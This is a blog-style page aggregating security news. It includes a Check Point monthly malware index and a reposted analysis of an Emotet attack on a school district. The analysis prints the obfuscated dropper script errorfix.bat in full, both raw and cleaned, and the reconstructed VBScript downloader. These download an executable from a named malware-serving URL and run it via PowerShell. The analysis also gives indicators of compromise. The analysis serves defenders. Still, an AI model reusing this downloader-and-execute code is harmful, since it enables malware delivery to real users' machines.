Featured Post

News Scan for Jun 29, 2020 | CIDRAP - CIDRAP

Image
News Scan for Jun 29, 2020 | CIDRAP - CIDRAPNews Scan for Jun 29, 2020 | CIDRAP - CIDRAPViruses: Breaking new grounds in research | Results Pack | CORDIS | European Commission - Cordis NewsHelping Others Make Healthy Choices - Texas A&M Today - Texas A&M University Today"How Contagion Works" author Paolo Giordano on the environmental, social and political factors impacting coronavirus and future threats - Sydney Morning HeraldPandemic Outbreaks in the Past Decade: A Research Overview - ResearchAndMarkets.com - Business WireNews Scan for Jun 29, 2020 | CIDRAP - CIDRAPPosted: 29 Jun 2020 12:00 AM PDT Ebola infects 4 more in DRC's Equateur province outbreakOfficials have reported 4 more confirmed cases in the Democratic Republic of the Congo (DRC) Equateur province Ebola outbreak, raising the total to 28, the World Health Organization (WHO) African regional office said today on Twitter.So far, no details on the latest cases in the DRC's 11th Ebola outbreak are no…

Check Point: Dridex Banking Trojan Ranks on Top Malware List for First Time - IT News Online

Check Point: Dridex Banking Trojan Ranks on Top Malware List for First Time - IT News Online


Check Point: Dridex Banking Trojan Ranks on Top Malware List for First Time - IT News Online

Posted: 14 Apr 2020 12:59 AM PDT

According to Check Point Research's Global Threat Index for March 2020, the well-known banking trojan Dridex, which first appeared in 2011, has entered the top ten malware list for the first time, as the third most prevalent malware in March. Dridex has been updated and is now being used in the early attack stages for downloading targeted ransomware, such as BitPaymer and DoppelPaymer.


The sharp increase in the use of Dridex was driven by several spam campaigns containing a malicious Excel file, which downloads Dridex malware into the victim's computer. This upsurge in Dridex malware highlights just how quickly cyber-criminals change the themes of their attacks to try and maximize infection rates. Dridex is a sophisticated strain of banking malware that targets the Windows platform, delivering spam campaigns to infect computers and steal banking credentials and other personal information to facilitate fraudulent money transfer. The malware has been systematically updated and developed over the past decade.

XMRig remains in 1st place in the Index of top malware families, impacting 5 percent of organizations globally, followed by Jsecoin and Dridex which impacted 4 percent and 3 percent of organizations worldwide, respectively.

"Dridex appearing for the first time as one of the top malware families shows how quickly cybercriminals can change their methods," said Maya Horowitz, Director, Threat Intelligence and Research, Products, Check Point. "This kind of malware can be very lucrative for criminals given its sophistication, and is now being used as a ransomware downloader, which makes it even more dangerous than previous variants. So, individuals need to be wary of emails with attachments, even if they appear to originate from a trusted source, especially with the explosion in home working over the past few weeks. Organizations need to be educating employees on how to identify malicious spam, and deploy security measures that help protect their teams and networks against such threats."

The research team also warns that "MVPower DVR Remote Code Execution" remained the most common exploited vulnerability, impacting 30 percent of organizations globally, closely followed by "PHP php-cgi Query String Parameter Code Execution" with a global impact of 29 percent, followed by "OpenSSL TLS DTLS Heartbeat Information Disclosure" impacting 27 percent of organizations worldwide.

Top malware families
(The arrows relate to the change in rank compared to the previous month.)

XMRig: XMRig is an open-source CPU mining software used for the mining process of the Monero cryptocurrency, first seen in the wild on May 2017.

Jsecoin: Jsecoin is a web-based cryptominer, designed to perform online mining of Monero cryptocurrency when a user visits a particular web page. The implanted JavaScript uses a large amount of the end user's computational resources to mine coins, thus impacting the system performance.

Dridex: Dridex is a Banking Trojan that targets the Windows platform and is delivered by spam campaigns and exploit kits, which rely on WebInjects to intercept and redirect banking credentials to an attacker-controlled server. Dridex contacts a remote server, sends information about the infected system and can also download and execute additional modules for remote control.

Trickbot: Trickbot is a dominant banking Trojan constantly being updated with new capabilities, features and distribution vectors. This enables Trickbot to be a flexible and customizable malware that can be distributed as part of multi-purposed campaigns.

Emotet: Emotet is an advanced, self-propagate and modular Trojan. Emotet was once employed as a banking Trojan and recently is used as a distributer to other malware or malicious campaigns. It uses multiple methods for maintaining persistence and evasion techniques to avoid detection. In addition, it can be spread through phishing spam emails containing malware.

Agent Tesla: Agent Tesla is an advanced RAT, functioning as a keylogger and a password stealer. Agent Tesla is capable of monitoring and collecting the victim's keyboard input, system clipboard, taking screenshots and exfiltrating credentials from a variety of software installed on a victim's machine (including Google Chrome, Mozilla Firefox and Microsoft Outlook email client).

Formbook: Formbook is an Info Stealer that harvests credentials from various web browsers, collects screenshots, monitors and logs keystrokes, and can download and execute files according to its C&C orders.

Lokibot: Lokibot is an Info Stealer distributed mainly by phishing emails and is used to steal various data such as email credentials, as well as passwords to CryptoCoin wallets and FTP servers.

Ramnit: Ramnit is banking Trojan that steals banking credentials, FTP passwords, session cookies and personal data.

RigEK: RigEK delivers exploits for Flash, Java, Silverlight and Internet Explorer. The infection chain starts with a redirection to a landing page that contains JavaScript that checks for vulnerable plug-ins and delivers the exploit.

Top exploited vulnerabilities

MVPower DVR Remote Code Execution: A remote code execution vulnerability that exists in MVPower DVR devices. A remote attacker can exploit this weakness to execute arbitrary code in the affected router via a crafted request.

PHP php-cgi Query String Parameter Code Execution: A remote code execution vulnerability that has been reported in PHP. The vulnerability is due to the improper parsing and filtering of query strings by PHP. A remote attacker may exploit this issue by sending crafted HTTP requests. Successful exploitation allows an attacker to execute arbitrary code on the target.

OpenSSL TLS DTLS Heartbeat Information Disclosure (CVE-2014-0160; CVE-2014-0346): An information disclosure vulnerability which exists in OpenSSL. The vulnerability is due to an error when handling TLS/DTLS heartbeat packets. An attacker can leverage this vulnerability to disclose memory contents of a connected client or server.

Web Server Exposed Git Repository Information Disclosure: An information disclosure vulnerability has been reported in Git Repository. Successful exploitation of this vulnerability could allow an unintentional disclosure of account information.

Dasan GPON Router Authentication Bypass (CVE-2018-10561): An authentication bypass vulnerability exists in Dasan GPON routers. Successful exploitation of this vulnerability would allow remote attackers to obtain sensitive information and gain unauthorized access into the affected system.

Huawei HG532 Router Remote Code Execution: A remote code execution vulnerability exists in Huawei HG532 Routers. A remote attacker can exploit this weakness to execute arbitrary code in the affected router via a crafted request.

D-Link DSL-2750B Remote Command Execution: An authentication bypass vulnerability exists in WordPress portable-phpMyAdmin Plugin. Successful exploitation of this vulnerability would allow remote attackers to obtain sensitive information and gain unauthorized access into the affected system.

PHP DIESCAN Information Disclosure: An information disclosure vulnerability that has been reported in the PHP pages. Successful exploitation could lead to the disclosure of sensitive information from the server.

SQL Injection (several techniques): Inserting an injection of SQL query in input from client to application, while exploiting a security vulnerability in an application's software.

OpenSSL Padding Oracle Information Disclosure: An information disclosure vulnerability exists in the AES-NI implementation of OpenSSL. The vulnerability is due to memory allocation miscalculation during a certain padding check. A remote attacker can exploit this vulnerability to obtain sensitive clear text information via a padding-oracle attack against an AES CBC session.

Top malware families - Mobile

This month xHelper retained the 1st place in the most prevalent mobile malware, followed by AndroidBauts and Lotoor.

xHelper: A malicious application seen in the wild since March 2019, used for downloading other malicious apps and display advertisement. The application can hide itself from the user and reinstall itself in case if uninstalled.

AndroidBauts: Adware targeting Android users that exfiltrates IMEI, IMSI, GPS location and other device information and allows the installation of third-party apps and shortcuts on mobile devices.

Lotoor: A hacking tool that exploits vulnerabilities on Android operating systems to gain root privileges on compromised mobile devices.

Emotet + Trickbot (unsuccessfully) attack Washington school district. - Elemental

Posted: 13 Apr 2020 05:10 PM PDT

Mason Moran

As COVID-19 prohibits most people from going to work, there are a few essential jobs that must adapt and overcome these trying times. I'm speaking specifically about education. School districts are currently getting swamped with requests to immediately transition all their traditional brick and mortar classes into virtual learning spaces so the business of educating America's youth can continue on unabated.

This massive undertaking comes at a time where schools are underfunded and understaffed more than ever. My team and I decided that we would reach out to a few choice school districts and see if they need assistance of any kind when it came to cyber security, threat hunting, IT infrastructure, etc. As it were, they actually did need assistance, they needed guidance on whether or not Zoom was safe for students to use, and offhandedly mentioned that they may have suffered an attack recently. Fortunately, the attack was never completed, Microsoft ATP shut down the process and the IT staff disconnected the host from the network.

This school district, while being very prominent, does not have the funding for any malware analysis personnel, a malware lab. My team was more than happy to help, so we decided to conduct some pro bono malware analysis and threat hunting on the bad actor that attempted to attack this school district. The IT staff sent us ATP information summary which listed the malicious domain, process trees, hashes, registries, and executables.

WHAT IS EMOTET?

Emotet was developed as a banking Trojan that traditionally is spread through malicious emails. Within those E-mails Emotet can be delivered several ways including; malicious links, macro-enabled documents, or malicious scripts. This instance happened when a user downloaded a ZIP7 file and a macro was automatically run from a .doc file. Emotet mimics worm like functionality in order to spread throughout a network, furthering the distribution of malware. It was this functionality that prompted the Department of Homeland Security to state that Emotet was one the most costly malware which costs up to $1,000,000 per incident to contain. Early Emotet iterations began as JavaScript files, with more sophisticated macro enabled versions being used to reach out to a command and control (C2) domain to pull down virus payloads to conduct an attack. It is important to note that Emotet knows if it's being run inside of a virtual machine. The malware will remain hidden if detects that it is in a sandbox.
What we discovered was the school district was subjected to, luckily unsuccessfully, an Emotet and possible ransomware attack.
The domain listed, www(.)agualuz(.)it/carasi/ubiitacarasea(.)php is to this day still up and serving up malware. Unfortunately, when my team went to the site to pull down our own samples of malware, the hashes did not match up with the samples that the school districts had. This is typical of Emotet to continuously change as to avoid detection. According to Malwarebytes, Emotet receives updates from its command and control server, much like the same way that operating systems pull down updates for your home devices.

Without Further Ado, here is what our team found:

FILE ANALYSIS

Name oletools-decrypt-OhBRGb.doc

Type Open Office XML document w/ macros (.docm)

Size 457,089 bytes

MD5 9263304fde358cc34bb97ae4d4dcadf6

SHA1 6b24fa52dd92c600db597337f403c0e6901d1e38

SHA256 690199bbf13fb6e96c9b1be4d5c329f1ae50e135839fe09d2aea72b44617048e

ssdeep 12288:38JbH1a/TDM00ODbVY1G610palxc9svznQQ:34Ja/k006bVYI2x2sbQQ

Analyst Notes:

Opening the document, we get presented with the typical "click 'Enable Content' in order to view this document" message, intended to trick users into allowing malicious macros in the document to execute.

Following the author's helpful suggestion doesn't produce the promised outcome (what a surprise). However, if we hop on over to Process Monitor and take a look at the process tree for our Word process, we'll see some interesting activity:

Here we see Word executing a Batch script file named "errorfix.bat" from a directory which previously didn't exist ("C:\DiskDrive\1\Volume\"). Visiting this new location, we'll find that the file is still there and contains the following:

errorfix.bat

set HyperX=C:\DiskDrive\1\Volume\BackFiles\pinumber.vbs

9348363686198739179751587226

9474742648528537769321458672

8412946179143649749358227398

echo Dim mySettings1, mySettings2, mySettings3, mySettings4, mySettings5, concept, Gear >> %HyperX%

echo On Error Resume Next >> %HyperX%

echo. >> %HyperX%

echo Set mySettings1 = Wscript.Arguments >> %HyperX%

echo Set mySettings2 = CreateObject("WinHttp.WinHttpRequest.5.1") >> %HyperX%

echo mySettings5 = mySettings1(0) >> %HyperX%

1368191838659622734354772892632419339

4358382767674781577257643818564872861

6644724718343573948724399898439484415

5495565692312222165371948243751121221

2985389129318138571829993894592289251

echo concept = mySettings1(1) >> %HyperX%

echo. >> %HyperX%

echo mySettings2.Open "GET", mySettings5, False >> %HyperX%

echo mySettings2.Send >> %HyperX%

echo Gear = mySettings2.Status >> %HyperX%

echo. >> %HyperX%

echo If Gear ^<^> 200 Then >> %HyperX%

echo WScript.Quit 1 >> %HyperX%

echo End If >> %HyperX%

echo. >> %HyperX%

echo Set mySettings4 = CreateObject("ADODB.Stream") >> %HyperX%

76826228779665155383762694561869834537778

59778282238469373774545735712189785747298

42752626353561456456952977647769564234586

41416423115176912399449464673328827377365

echo mySettings4.Open >> %HyperX%

echo mySettings4.Type = 1 >> %HyperX%

echo mySettings4.Write mySettings2.ResponseBody >> %HyperX%

echo mySettings4.Position = 0 >> %HyperX%

echo. >> %HyperX%

echo Set mySettings3 = CreateObject("Scripting.FileSystemObject") >> %HyperX%

66924269127968475

61661866173271951

34845411555886914

78783942258211475

43317726392434975

84774169224839635

35217925795327483

57761797252482465

63126124233291271

61945694767658536

92555235759141739

echo If mySettings3.FileExists(concept) Then mySettings3.DeleteFile concept >> %HyperX%

echo mySettings4.SaveToFile concept >> %HyperX%

echo mySettings4.Close >> %HyperX%

67211168772487297341581816112538782731917

88668316912451491877764622866549215835537

56952965353626615349315163857523565315944

77813479238582998597633752529469167496146

27126985826419241191925967997145781913182

cscript //nologo C:\DiskDrive\1\Volume\BackFiles\pinumber.vbs http://agualuz.it/carasi/ubiitacarasea.php C:\DiskDrive\1\Volume\

BackFiles\Heriopa.exe

8582345713269493816473851488

8984972686169863749273681218

5547934191651715962991639596

9833698695753915728639531826

9268881419882989999583336871

break>C:\DiskDrive\1\Volume\BackFiles\pinumber.vbs

6687295446763635799336821764

6184512158443885714753439345

9482186474349379752922578492

6725684161211681964934572924

powers^

hell -C Sleep -s 4;Saps 'C:\DiskDrive\1\Volume\BackFiles\Heriopa.exe'

65438893731981658182923637951611528213147

77373845766741617451934377397795365385633

44931356696737354815758129841651963146884

97759735255533916424192157142563198882455

After cleaning the script up, this is what we're left with:

errorfix.bat (Clean)

set HyperX=C:\DiskDrive\1\Volume\BackFiles\pinumber.vbs

echo Dim mySettings1, mySettings2, mySettings3, mySettings4, mySettings5, concept, Gear >> %HyperX%

echo On Error Resume Next >> %HyperX%

echo. >> %HyperX%

echo Set mySettings1 = Wscript.Arguments >> %HyperX%

echo Set mySettings2 = CreateObject("WinHttp.WinHttpRequest.5.1") >> %HyperX%

echo mySettings5 = mySettings1(0) >> %HyperX%

echo concept = mySettings1(1) >> %HyperX%

echo. >> %HyperX%

echo mySettings2.Open "GET", mySettings5, False >> %HyperX%

echo mySettings2.Send >> %HyperX%

echo Gear = mySettings2.Status >> %HyperX%

echo. >> %HyperX%

echo If Gear ^<^> 200 Then >> %HyperX%

echo WScript.Quit 1 >> %HyperX%

echo End If >> %HyperX%

echo. >> %HyperX%

echo Set mySettings4 = CreateObject("ADODB.Stream") >> %HyperX%

echo mySettings4.Open >> %HyperX%

echo mySettings4.Type = 1 >> %HyperX%

echo mySettings4.Write mySettings2.ResponseBody >> %HyperX%

echo mySettings4.Position = 0 >> %HyperX%

echo. >> %HyperX%

echo Set mySettings3 = CreateObject("Scripting.FileSystemObject") >> %HyperX%

echo If mySettings3.FileExists(concept) Then mySettings3.DeleteFile concept >> %HyperX%

echo mySettings4.SaveToFile concept >> %HyperX%

echo mySettings4.Close >> %HyperX%

cscript //nologo C:\DiskDrive\1\Volume\BackFiles\pinumber.vbs http://agualuz.it/carasi/ubiitacarasea.php C:\DiskDrive\1\Volume\

BackFiles\Heriopa.exe

break>C:\DiskDrive\1\Volume\BackFiles\pinumber.vbs

powershell -C Sleep -s 4;Start-Process 'C:\DiskDrive\1\Volume\BackFiles\Heriopa.exe'

Here we see that errorfix.bat builds a VBScript file by echoing code into the file "C:\DiskDrive\1\Volume\BackFiles\pinumber.vbs". pinumber.vbs is then executed via cscript, and passed two arguments:

hxxp://agualuz.it/carasi/ubiitacarasea.php

C:\DiskDrive\1\Volume\BackFiles\Heriopa.exe

We see that after executing pinumber.vbs, errorfix.bat clears the file's contents with the line "break>C:\DiskDrive\1\Volume\BackFiles\pinumber.vbs". Putting the file back together is no trouble though:

pinumber.vbs

Dim mySettings1, mySettings2, mySettings3, mySettings4, mySettings5, concept, Gear

On Error Resume Next

Set mySettings2 = CreateObject("WinHttp.WinHttpRequest.5.1")

mySettings5 = mySettings1(0)

concept = mySettings1(1)

mySettings2.Open "GET", mySettings5, False

mySettings2.Send

Gear = mySettings2.Status

If Gear <> 200 Then

WScript.Quit 1

End If

Set mySettings4 = CreateObject("ADODB.Stream")

mySettings4.Open

mySettings4.Type = 1

mySettings4.Write mySettings2.ResponseBody

mySettings4.Position = 0

Set mySettings3 = CreateObject("Scripting.FileSystemObject")

If mySettings3.FileExists(concept) Then mySettings3.DeleteFile concept

mySettings4.SaveToFile concept

mySettings4.Close

As you've probably already guessed, this script will download a file from the URL supplied as the first argument (hxxp://agualuz.it/carasi/ubiitacarasea.php) and save it to the path provided in the second argument (C:\DiskDrive\1\Volume\BackFiles\Heriopa.exe). And if we go back to errorfix.bat, we'll see that it's final act is to have PowerShell execute the downloaded file.

Indicators of Compromise

• Created directories:

◦ C:\DiskDrive\

◦ C:\DiskDrive\1\

◦ C:\DiskDrive\1\Volume\

◦ C:\DiskDrive\1\Volume\BackFiles\

• Created files:

◦ C:\DiskDrive\1\Volume\errorfix.bat

▪ Size: 2,877 bytes

▪ MD5: 4e066023c2dc2088807e8c7afad150ca

▪ SHA1: 4b1e4a4ff73eafca79c57d44a612f18fc0fc78a2

▪ SHA256: 8a8068c62687d79917042819e6984a93efcddf939060376b2f09ee88d589a39f

◦ C:\DiskDrive\1\Volume\BackFiles\pinumber.vbs

▪ Size: 739 bytes

▪ MD5: a686b686c064a497e4a55e477ce4eacf

▪ SHA1: 181227fa3c106895cb925fb42685c5ad00ee5e03

▪ SHA256: c412d610965b38a940debd016a07a5b97d01d80d266a8d1796a3a3dae8241a04

◦ C:\DiskDrive\1\Volume\BackFiles\Heriopa.exe

• Domains:

◦ agualuz.it

• URLs:

◦ hxxp://agualuz.it/carasi/ubiitacarasea.php

Written by Mason Moran and Joe Lustri.

About the Authors:

Mason Moran is a cyber security professional who is currently working for the government. He has roughly 8 years of experience in working with the government, specializing in operations, vulnerability assessment, incident response, SIEM, security engineering, and threat hunting. Mason also has experience in other fields such as threat intelligence, malware analysis, social engineering. Mason holds many certifications including: Security +, SSCP, CEH, Splunk Power User, ACAS Scan, and others. In recent times, he and fellow colleagues have formed a cyber security group that is currently volunteering their skills and time during the COVID-19 pandemic to help others in need, such as school districts and small businesses.

Joe Lustri is a malware analyst and aspiring software engineer who currently works for the government. He has roughly six years working in this capacity. Joe currently wears multiple hats as he is also the team lead for a digital forensics and malware analysis shop that also works for the government. Joe showed early on in his career that he had a knack for solving problems, developing five separate toolsets for the government to automate work and rid processes of human error. He currently holds GIAC Certified Forensic Examiner, GIAC Reverse Engineering Malware, and Cellebrite Advanced Smartphone Analysis. Joe is currently is the lead software engineer for the previously mentioned group.

Comments

Popular Posts

System detected an overrun of a stack-based buffer in this application [FIX] - Windows Report

Valorant anti-cheat lead answers many questions on Reddit - Millenium US